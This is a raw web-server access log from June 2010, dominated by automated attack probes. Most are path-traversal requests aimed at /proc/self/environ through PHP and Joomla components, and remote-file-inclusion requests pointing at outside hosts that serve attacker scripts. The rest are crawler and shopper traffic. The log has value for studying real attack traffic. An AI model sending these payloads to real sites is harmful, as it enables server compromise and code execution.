211.43.212.56 - - [21/Jun/2010:00:00:05 -0400] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:00:00:10 -0400] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.822"
67.228.62.66 - - [21/Jun/2010:00:00:15 -0400] "GET /modules/errors.php?error=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
67.228.62.66 - - [21/Jun/2010:00:00:16 -0400] "GET /logs/modules/errors.php?error=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
67.228.62.66 - - [21/Jun/2010:00:00:16 -0400] "GET /logs/error_log.Q109111400/modules/errors.php?error=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
85.235.154.15 - - [21/Jun/2010:00:00:23 -0400] "GET //ggambo4100_gallery2/setup.php?setup[use_category]=1&dir=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
85.235.154.15 - - [21/Jun/2010:00:00:23 -0400] "GET /logs/error_log.Q109092700%20%20//ggambo4100_gallery2/setup.php?setup[use_category]=1&dir=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
85.235.154.15 - - [21/Jun/2010:00:00:23 -0400] "GET /logs//ggambo4100_gallery2/setup.php?setup[use_category]=1&dir=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
211.43.212.56 - - [21/Jun/2010:00:00:26 -0400] "GET /logs/access_log.Q109071100//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.822"
67.228.62.66 - - [21/Jun/2010:00:00:26 -0400] "GET /modules/errors.php?error=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
67.228.62.66 - - [21/Jun/2010:00:00:26 -0400] "GET /logs/modules/errors.php?error=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
67.228.62.66 - - [21/Jun/2010:00:00:26 -0400] "GET /logs/error_log.Q109050700%20%20/modules/errors.php?error=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
67.228.62.66 - - [21/Jun/2010:00:00:32 -0400] "GET /logs/error_log.Q109090800%20%20/modules/errors.php?error=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
85.235.154.15 - - [21/Jun/2010:00:00:35 -0400] "GET //ggambo4100_gallery2/setup.php?setup[use_category]=1&dir=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
85.235.154.15 - - [21/Jun/2010:00:00:35 -0400] "GET /logs//ggambo4100_gallery2/setup.php?setup[use_category]=1&dir=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
85.235.154.15 - - [21/Jun/2010:00:00:35 -0400] "GET /logs/error_log.Q109092700%20%20//ggambo4100_gallery2/setup.php?setup[use_category]=1&dir=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
67.59.156.163 - - [21/Jun/2010:00:00:42 -0400] "GET /logs/access_log.Q109082000%20%20//ggambo4100_gallery2/setup.php?setup[use_category]=1&dir=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
67.195.114.223 - - [21/Jun/2010:00:00:47 -0400] "GET /images/_notes/download_EZ_PRP_lg.jpg.mno HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
85.235.154.15 - - [21/Jun/2010:00:00:55 -0400] "GET /logs/access_log.Q109082000%20%20//ggambo4100_gallery2/setup.php?setup[use_category]=1&dir=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
85.235.154.15 - - [21/Jun/2010:00:00:56 -0400] "GET /logs/access_log.Q109082000%20%20//ggambo4100_gallery2/setup.php?setup[use_category]=1&dir=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
67.59.156.163 - - [21/Jun/2010:00:00:57 -0400] "GET //ggambo4100_gallery2/setup.php?setup[use_category]=1&dir=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
67.59.156.163 - - [21/Jun/2010:00:00:57 -0400] "GET /logs//ggambo4100_gallery2/setup.php?setup[use_category]=1&dir=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
67.59.156.163 - - [21/Jun/2010:00:00:57 -0400] "GET /logs/error_log.Q109092700%20%20//ggambo4100_gallery2/setup.php?setup[use_category]=1&dir=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
194.42.16.25 - - [21/Jun/2010:00:01:12 -0400] "GET /logs/viewbody.html?code=http://www.biasy.net//modules/news_afp/idxx.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
194.42.16.25 - - [21/Jun/2010:00:01:12 -0400] "GET /viewbody.html?code=http://www.biasy.net//modules/news_afp/idxx.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
194.42.16.25 - - [21/Jun/2010:00:01:12 -0400] "GET /logs/access_log.Q109051600/viewbody.html?code=http://www.biasy.net//modules/news_afp/idxx.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
121.78.118.123 - - [21/Jun/2010:00:01:29 -0400] "GET /logs/access_log.Q110061100/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
174.142.68.199 - - [21/Jun/2010:00:01:39 -0400] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.810"
67.228.62.66 - - [21/Jun/2010:00:01:48 -0400] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.810"
67.228.62.66 - - [21/Jun/2010:00:01:48 -0400] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.810"
64.15.156.75 - - [21/Jun/2010:00:01:49 -0400] "GET /viewbody.html?code=http://www.biasy.net//modules/news_afp/idxx.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
64.15.156.75 - - [21/Jun/2010:00:01:49 -0400] "GET /logs/viewbody.html?code=http://www.biasy.net//modules/news_afp/idxx.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
64.15.156.75 - - [21/Jun/2010:00:01:49 -0400] "GET /logs/access_log.Q109051600/viewbody.html?code=http://www.biasy.net//modules/news_afp/idxx.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
67.59.156.163 - - [21/Jun/2010:00:02:43 -0400] "GET /logs/access_log.Q109082000%20%20//ggambo4100_gallery2/setup.php?setup[use_category]=1&dir=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
64.15.156.75 - - [21/Jun/2010:00:02:52 -0400] "GET /logs/access_log.Q110021600%20%20/viewbody.html?code=http://www.biasy.net//modules/news_afp/idxx.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
202.125.152.246 - - [21/Jun/2010:00:03:06 -0400] "GET /logs/access_log.Q109053100%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.biasy.net//modules/news_afp/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
202.125.152.246 - - [21/Jun/2010:00:03:06 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.biasy.net//modules/news_afp/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
202.125.152.246 - - [21/Jun/2010:00:03:06 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.biasy.net//modules/news_afp/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
94.228.131.90 - - [21/Jun/2010:00:03:54 -0400] "GET /skin/zero_vote/setup.php?%20dir=http://ssq-dla.com/components/com_content/1.pdf? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
94.228.131.90 - - [21/Jun/2010:00:03:54 -0400] "GET /logs/skin/zero_vote/setup.php?%20dir=http://ssq-dla.com/components/com_content/1.pdf? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
94.228.131.90 - - [21/Jun/2010:00:03:54 -0400] "GET /logs/access_log.Q110060700%20%20/skin/zero_vote/setup.php?%20dir=http://ssq-dla.com/components/com_content/1.pdf? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
202.125.152.246 - - [21/Jun/2010:00:04:12 -0400] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.biasy.net//modules/news_afp/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
202.125.152.246 - - [21/Jun/2010:00:04:12 -0400] "GET //index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.biasy.net//modules/news_afp/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
202.125.152.246 - - [21/Jun/2010:00:04:12 -0400] "GET /logs/access_log.Q109053100%20%20//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.biasy.net//modules/news_afp/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
94.228.131.90 - - [21/Jun/2010:00:04:15 -0400] "GET /logs/access_log.Q110060700/skin/zero_vote/setup.php?%20dir=http://ssq-dla.com/components/com_content/1.pdf? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
94.228.131.90 - - [21/Jun/2010:00:04:15 -0400] "GET /logs/skin/zero_vote/setup.php?%20dir=http://ssq-dla.com/components/com_content/1.pdf? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
94.228.131.90 - - [21/Jun/2010:00:04:15 -0400] "GET /skin/zero_vote/setup.php?%20dir=http://ssq-dla.com/components/com_content/1.pdf? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
72.14.193.1 - - [21/Jun/2010:00:03:57 -0400] "GET /logs/access_log.Q110012700 HTTP/1.1" 200 6454383 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp),gzip(gfe) (via docs.google.com/viewer)"
94.228.131.90 - - [21/Jun/2010:00:04:21 -0400] "GET /logs/access_log.Q109080600/skin/zero_vote/setup.php?%20dir=http://ssq-dla.com/components/com_content/1.pdf? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
94.228.131.90 - - [21/Jun/2010:00:04:23 -0400] "GET /logs/access_log.Q109080600%20%20/skin/zero_vote/setup.php?%20dir=http://ssq-dla.com/components/com_content/1.pdf? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
94.228.131.90 - - [21/Jun/2010:00:04:28 -0400] "GET /skin/zero_vote/setup.php?%20dir=http://ssq-dla.com/components/com_content/1.pdf? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
94.228.131.90 - - [21/Jun/2010:00:04:28 -0400] "GET /logs/access_log.Q110060700/skin/zero_vote/setup.php?%20dir=http://ssq-dla.com/components/com_content/1.pdf? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
94.228.131.90 - - [21/Jun/2010:00:04:28 -0400] "GET /logs/skin/zero_vote/setup.php?%20dir=http://ssq-dla.com/components/com_content/1.pdf? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
94.228.131.90 - - [21/Jun/2010:00:04:34 -0400] "GET /logs/access_log.Q109080600/skin/zero_vote/setup.php?%20dir=http://ssq-dla.com/components/com_content/1.pdf? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
189.108.172.26 - - [21/Jun/2010:00:04:59 -0400] "GET /logs/modules/errors.php?error=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
189.108.172.26 - - [21/Jun/2010:00:04:59 -0400] "GET /modules/errors.php?error=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
174.142.68.199 - - [21/Jun/2010:00:05:02 -0400] "GET /logs/access_log.Q110053000/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
174.142.68.199 - - [21/Jun/2010:00:05:02 -0400] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.810"
174.142.68.199 - - [21/Jun/2010:00:05:02 -0400] "GET /logs/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.810"
209.59.12.99 - - [21/Jun/2010:00:05:04 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.228.62.66 - - [21/Jun/2010:00:05:15 -0400] "GET /logs/access_log.Q110053000/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
67.228.62.66 - - [21/Jun/2010:00:05:15 -0400] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.810"
94.228.131.90 - - [21/Jun/2010:00:05:15 -0400] "GET /skin/zero_vote/setup.php?%20dir=http://ssq-dla.com/components/com_content/1.pdf? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
94.228.131.90 - - [21/Jun/2010:00:05:15 -0400] "GET /logs/access_log.Q110060700%20%20/skin/zero_vote/setup.php?%20dir=http://ssq-dla.com/components/com_content/1.pdf? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
94.228.131.90 - - [21/Jun/2010:00:05:15 -0400] "GET /logs/skin/zero_vote/setup.php?%20dir=http://ssq-dla.com/components/com_content/1.pdf? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
67.228.62.66 - - [21/Jun/2010:00:05:15 -0400] "GET /logs/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.810"
67.228.62.66 - - [21/Jun/2010:00:05:19 -0400] "GET /logs/access_log.Q110053000/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
67.228.62.66 - - [21/Jun/2010:00:05:19 -0400] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.810"
67.228.62.66 - - [21/Jun/2010:00:05:20 -0400] "GET /logs/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.810"
94.228.131.90 - - [21/Jun/2010:00:05:45 -0400] "GET /logs/access_log.Q109080600%20%20/skin/zero_vote/setup.php?%20dir=http://ssq-dla.com/components/com_content/1.pdf? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
174.142.68.199 - - [21/Jun/2010:00:05:57 -0400] "GET /logs/error_log.Q110053000/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 233 "-" "libwww-perl/5.810"
67.59.156.163 - - [21/Jun/2010:00:06:01 -0400] "GET /logs/access_log.Q110010400/components/com_performs/performs.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
194.42.16.25 - - [21/Jun/2010:00:06:04 -0400] "GET /logs/access_log.Q110021600%20%20/viewbody.html?code=http://www.biasy.net//modules/news_afp/idxx.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
202.130.32.19 - - [21/Jun/2010:00:06:11 -0400] "GET /logs/access_log.Q110051100//box_display.php?box=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 241 "-" "libwww-perl/5.831"
202.130.32.19 - - [21/Jun/2010:00:06:11 -0400] "GET //box_display.php?box=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 214 "-" "libwww-perl/5.831"
202.130.32.19 - - [21/Jun/2010:00:06:12 -0400] "GET /logs//box_display.php?box=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 219 "-" "libwww-perl/5.831"
67.228.62.66 - - [21/Jun/2010:00:06:31 -0400] "GET /logs/error_log.Q110053000/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 233 "-" "libwww-perl/5.810"
67.228.62.66 - - [21/Jun/2010:00:06:39 -0400] "GET /logs/error_log.Q110053000/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 233 "-" "libwww-perl/5.810"
202.130.32.19 - - [21/Jun/2010:00:06:41 -0400] "GET /logs/access_log.Q110050800//box_display.php?box=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 241 "-" "libwww-perl/5.831"
202.130.32.19 - - [21/Jun/2010:00:07:08 -0400] "GET //box_display.php?box=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 214 "-" "libwww-perl/5.831"
211.43.212.56 - - [21/Jun/2010:00:07:40 -0400] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:00:07:42 -0400] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:00:08:00 -0400] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:00:08:01 -0400] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.822"
66.249.71.206 - - [21/Jun/2010:00:08:42 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+LG28ABC5371A6A00063B300L+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
211.43.212.56 - - [21/Jun/2010:00:08:53 -0400] "GET /logs/error_log.Q109122100/scan../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-" "libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:00:08:54 -0400] "GET /scan../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 264 "-" "libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:00:08:54 -0400] "GET /logs/scan../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 269 "-" "libwww-perl/5.822"
203.211.129.97 - - [21/Jun/2010:00:08:57 -0400] "GET /logs/access_log.Q110061100/?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.831"
211.43.212.56 - - [21/Jun/2010:00:08:58 -0400] "GET /logs/error_log.Q109122100/scan../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-" "libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:00:08:58 -0400] "GET /scan../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 264 "-" "libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:00:08:59 -0400] "GET /logs/scan../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 269 "-" "libwww-perl/5.822"
201.36.173.93 - - [21/Jun/2010:00:09:09 -0400] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.831"
211.43.212.56 - - [21/Jun/2010:00:09:18 -0400] "GET /logs/error_log.Q109080400/scan../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-" "libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:00:09:19 -0400] "GET /logs/error_log.Q109080400/scan../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-" "libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:00:09:30 -0400] "GET /scan../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 264 "-" "libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:00:09:40 -0400] "GET /scan../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 264 "-" "libwww-perl/5.822"
202.125.152.246 - - [21/Jun/2010:00:09:58 -0400] "GET /viewbody.html?code=http://www.biasy.net//modules/news_afp/idxx.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
202.125.152.246 - - [21/Jun/2010:00:09:58 -0400] "GET /logs/access_log.Q109051600/viewbody.html?code=http://www.biasy.net//modules/news_afp/idxx.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
202.125.152.246 - - [21/Jun/2010:00:09:58 -0400] "GET /logs/viewbody.html?code=http://www.biasy.net//modules/news_afp/idxx.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
211.43.212.56 - - [21/Jun/2010:00:10:30 -0400] "GET /logs/access_log.Q109070700//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:00:10:31 -0400] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:00:10:31 -0400] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:00:10:38 -0400] "GET /logs/access_log.Q109070700//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:00:10:38 -0400] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:00:10:38 -0400] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.822"
69.73.166.6 - - [21/Jun/2010:00:10:49 -0400] "GET /logs/access_log.Q109070300/?step=1&vwar_root=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.832"
69.73.166.6 - - [21/Jun/2010:00:10:49 -0400] "GET /?step=1&vwar_root=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.832"
69.73.166.6 - - [21/Jun/2010:00:10:49 -0400] "GET /logs/?step=1&vwar_root=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 55286 "-" "libwww-perl/5.832"
67.59.156.163 - - [21/Jun/2010:00:11:35 -0400] "GET /logs/access_log.Q110010400/components/com_performs/performs.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
174.142.68.199 - - [21/Jun/2010:00:12:01 -0400] "GET /logs/access_log.Q110061100/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
174.142.68.199 - - [21/Jun/2010:00:12:01 -0400] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.810"
174.142.68.199 - - [21/Jun/2010:00:12:01 -0400] "GET /logs/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.810"
67.228.62.66 - - [21/Jun/2010:00:12:01 -0400] "GET /logs/access_log.Q110061100/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
67.228.62.66 - - [21/Jun/2010:00:12:01 -0400] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.810"
67.228.62.66 - - [21/Jun/2010:00:12:01 -0400] "GET /logs/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.810"
121.88.4.74 - - [21/Jun/2010:00:12:02 -0400] "GET /logs/access_log.Q110052500/pingserver.php HTTP/1.1" 404 239 "-" "libwww-perl/5.79"
121.88.4.74 - - [21/Jun/2010:00:12:02 -0400] "GET /logs/access_log.Q110052500/pingserver.php HTTP/1.1" 404 239 "-" "libwww-perl/5.79"
121.88.4.74 - - [21/Jun/2010:00:12:04 -0400] "GET /pingserver.php HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
121.88.4.74 - - [21/Jun/2010:00:12:04 -0400] "GET /pingserver.php HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
67.228.62.66 - - [21/Jun/2010:00:12:04 -0400] "GET /logs/access_log.Q110061100/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
67.228.62.66 - - [21/Jun/2010:00:12:04 -0400] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.810"
121.88.4.74 - - [21/Jun/2010:00:12:04 -0400] "GET /logs/pingserver.php HTTP/1.1" 404 217 "-" "libwww-perl/5.79"
67.228.62.66 - - [21/Jun/2010:00:12:04 -0400] "GET /logs/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.810"
121.88.4.74 - - [21/Jun/2010:00:12:05 -0400] "GET /logs/pingserver.php HTTP/1.1" 404 217 "-" "libwww-perl/5.79"
92.36.192.210 - - [21/Jun/2010:00:12:15 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS%20(S0040):0 HTTP/1.1" 200 56561 "http://www.acesurgical.com/ubs_tips.html" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
211.43.212.56 - - [21/Jun/2010:00:12:25 -0400] "GET /logs/access_log.Q110022700//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:00:12:25 -0400] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.822"
211.43.212.56 - - [21/Jun/2010:00:12:25 -0400] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.822"
92.36.192.210 - - [21/Jun/2010:00:12:27 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
92.36.192.210 - - [21/Jun/2010:00:12:27 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
